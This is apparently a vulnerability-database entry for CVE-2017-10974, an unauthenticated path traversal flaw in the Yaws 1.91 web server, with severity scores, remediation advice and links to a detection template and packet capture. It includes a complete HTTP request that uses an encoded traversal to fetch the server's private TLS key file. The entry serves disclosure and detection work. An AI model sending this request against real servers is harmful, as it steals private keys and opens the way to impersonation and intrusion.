| Title | Yaws 1.91 - Local File Inclusion |
|---|---|
| Author | 0x_Akoko |
| Severity | High |
| Impact | The vulnerability allows an attacker to include local files on the server, potentially leading to unauthorized access or information disclosure. |
| Remediation | Upgrade to a patched version of Yaws or apply the necessary security patches. |
| CVSS Score | 7.5 |
| EPSS Score | 0.89548 |
| CVE ID | CVE-2017-10974 |
| CWE ID | CWE-22 |
| Tags | cve cve2017 edb yaws lfi vkev vuln |
Yaws 1.91 allows unauthenticated local file inclusion via /%5C../ submitted to port 8080.
GET /%5C../ssl/yaws-key.pem HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-10974.yaml
🦈 Packet Capture: ⬇️ Download cve-2017-10974.pcap
N/AN/A